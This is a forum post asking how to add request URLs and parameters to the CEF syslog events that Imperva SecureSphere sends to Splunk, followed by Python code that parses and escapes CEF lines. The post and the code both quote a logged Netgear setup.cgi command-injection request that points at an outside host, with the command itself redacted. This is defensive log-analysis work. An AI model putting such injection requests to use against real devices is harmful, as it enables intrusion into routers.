hello?
I'm sending detection events from SecureSphere to Splunk using syslog.
The syslog template is:
CEF:0|Imperva Inc.|SecureSphere|${SecureSphereVersion}|${Alert.alertType}|#cefEscapeMessage(${Alert.alertMetadata.alertName})|${Alert.severity}|act=${Alert.immediateAction} dst=${Event.destInfo.serverIp} dpt=${Event.destInfo.serverPort} duser=#cefEscapeExtension(${Alert.username}) src=${Event.sourceInfo.sourceIp} spt=${Event.sourceInfo.sourcePort} proto=${Event.sourceInfo.ipProtocol} rt=#arcsightDate(${Alert.createTime}) cat=Alert cs1=#cefEscapeExtension(${Rule.parent.displayName}) cs1Label=Policy cs2=#cefEscapeExtension(${Alert.serverGroupName}) cs2Label=ServerGroup cs3=#cefEscapeExtension(${Alert.serviceName}) cs3Label=ServiceName cs4=#cefEscapeExtension(${Alert.applicationName}) cs4Label=ApplicationName cs5=#cefEscapeExtension(${Alert.description}) cs5Label=Description
|
The log line received in Splunk is:
10.10.10.10 CEF:0|Imperva Inc.|SecureSphere|13.6.0|Protocol|Illegal Parameter Encoding|Low|act=None dst=20.20.20.20 dpt=80 duser=n/a src=45.146.165.129 spt=53387 proto=TCP rt=2023/01/21 17:51:05/08/30 14:48:37 cat=Alert cs1=HTTP/1.x Protocol Policy cs1Label=Policy cs2=Server_Zone_2 cs2Label=ServerGroup cs3=Service_Zone_2 cs3Label=ServiceName cs4=Default Web Application cs4Label=ApplicationName cs5="Multiple Nuclei Scanner(+)" cs5Label=Description
When analyzing an attack, this information is sometimes lacking.
Actually, SecureSphere logs more information, like the URL, parameters and headers:
GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=[attack command]http://30.30.30.30:45537/~~~~ HTTP/1.0
If the above information were included in the syslog, the analysis would be much more helpful.
I wonder if such a setup is currently possible in SecureSphere.
If I can't do it via syslog, is there another way? Exporting the detection log to CSV did not show this information either.
I look forward to your reply.
Thank you.
#On-PremisesWAF(formerlySecuresphere)
------------------------------
Seungyeon Han
CEO
Yeungnam University College
Seoul
------------------------------
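The post's question turns on two CEF details: custom-string fields only make sense once they are resolved through their csNLabel names, and any request URL put into an extension must be escaped, because CEF treats an unescaped `=` as the start of a new key. The following is an added example (hypothetical helper code, not Imperva's or Splunk's) that implements CEF header and extension escaping, parses the exact line the post shows Splunk receiving, reports that the standard CEF keys `requestMethod` and `request` are absent, and then round-trips the post's request line through those keys. Whether SecureSphere's template can populate `request`/`requestMethod` is an assumption, which is precisely what the post asks.

```python
"""CEF escaping and parsing for the SecureSphere -> Splunk line in the post (added example)."""
import re

# Constructed from the post's received log line (IPs exactly as shown in the post).
SAMPLE = (
    '10.10.10.10 CEF:0|Imperva Inc.|SecureSphere|13.6.0|Protocol|Illegal Parameter Encoding|Low|'
    'act=None dst=20.20.20.20 dpt=80 duser=n/a src=45.146.165.129 spt=53387 proto=TCP '
    'rt=2023/01/21 17:51:05/08/30 14:48:37 cat=Alert cs1=HTTP/1.x Protocol Policy cs1Label=Policy '
    'cs2=Server_Zone_2 cs2Label=ServerGroup cs3=Service_Zone_2 cs3Label=ServiceName '
    'cs4=Default Web Application cs4Label=ApplicationName '
    'cs5="Multiple Nuclei Scanner(+)" cs5Label=Description'
)

# The request line the post says SecureSphere logs but the syslog template omits;
# the "[attack command]" placeholder is kept as the post shows it.
SAMPLE_REQUEST = ('GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=[attack command]'
                  'http://30.30.30.30:45537/~~~~ HTTP/1.0')

HEADER_FIELDS = ('version', 'vendor', 'product', 'device_version',
                 'signature_id', 'name', 'severity')


def cef_escape_header(value):
    """Escaping CEF requires in header fields: backslash and pipe."""
    return value.replace('\\', '\\\\').replace('|', '\\|')


def cef_escape_extension(value):
    """Escaping CEF requires in extension values: backslash, '=' and line breaks.
    A URL full of '=' (as in SAMPLE_REQUEST) is the case where this matters."""
    return (value.replace('\\', '\\\\').replace('=', '\\=')
                 .replace('\r', '\\r').replace('\n', '\\n'))


def _unescape_extension(value):
    return re.sub(r'\\(.)', lambda m: {'n': '\n', 'r': '\r'}.get(m.group(1), m.group(1)), value)


def _split_header(cef):
    """Split on unescaped '|' into the 7 header fields; the remainder is the extension."""
    fields, cur, i = [], [], 0
    while i < len(cef) and len(fields) < 7:
        ch = cef[i]
        if ch == '\\' and i + 1 < len(cef):          # keep the escaped char literally
            cur.append(cef[i + 1]); i += 2
        elif ch == '|':
            fields.append(''.join(cur)); cur = []; i += 1
        else:
            cur.append(ch); i += 1
    if len(fields) != 7:
        raise ValueError('malformed CEF header: expected 7 pipe-delimited fields')
    return fields, cef[i:]


# A key is a run of [A-Za-z0-9_] at the start or after whitespace, followed by an
# unescaped '='; an escaped '\=' is preceded by a backslash, which is not a key char,
# so values such as "HTTP/1.x Protocol Policy" (spaces, no '=') stay intact.
_KEY_RE = re.compile(r'(?:^|(?<=\s))([A-Za-z0-9_]+)=')


def parse_extension(ext):
    """key=value pairs whose values may contain spaces; returns dict of unescaped values."""
    keys = list(_KEY_RE.finditer(ext))
    out = {}
    for n, m in enumerate(keys):
        end = keys[n + 1].start() if n + 1 < len(keys) else len(ext)
        out[m.group(1)] = _unescape_extension(ext[m.end():end].rstrip())
    return out


def parse_cef(line):
    """Parse a syslog-prefixed CEF line into header fields, raw extensions and the
    custom-string fields resolved through their csNLabel names. Values such as the
    odd-looking rt= are kept verbatim; nothing is reinterpreted."""
    cef = line[line.index('CEF:'):]                  # drop the syslog host prefix
    header, ext = _split_header(cef)
    fields = dict(zip(HEADER_FIELDS, header))
    fields['version'] = fields['version'].split(':', 1)[1]
    extension = parse_extension(ext)
    labeled = {}
    for key, label in extension.items():
        if key.endswith('Label') and key[:-5] in extension:
            labeled[label] = extension[key[:-5]]      # cs1Label=Policy -> labeled['Policy'] = cs1
    return {'header': fields, 'extension': extension, 'labeled': labeled}


# Standard CEF extension keys for the request line. Whether SecureSphere's syslog
# template can fill them is assumed here; it is exactly what the post asks.
REQUEST_KEYS = ('requestMethod', 'request')


def missing_request_fields(parsed):
    return [k for k in REQUEST_KEYS if k not in parsed['extension']]


def with_request(line, request_line):
    """Constructed: append the request line as properly escaped CEF extensions."""
    method, rest = request_line.split(' ', 1)
    url = rest.rsplit(' ', 1)[0]                     # strip the trailing HTTP/1.0
    return (line + ' requestMethod=' + cef_escape_extension(method)
                 + ' request=' + cef_escape_extension(url))


if __name__ == '__main__':
    parsed = parse_cef(SAMPLE)
    print(parsed['labeled'])
    print('missing:', missing_request_fields(parsed))
    print(parse_cef(with_request(SAMPLE, SAMPLE_REQUEST))['extension']['request'])
```

Running it on the post's line yields the five labeled fields (Policy, ServerGroup, ServiceName, ApplicationName, Description) and reports both request keys as missing; after `with_request`, the URL with its three `=` characters survives the round trip because they were emitted as `\=`, which is the job a `#cefEscapeExtension` macro has to do for any URL or parameter value the template is extended with.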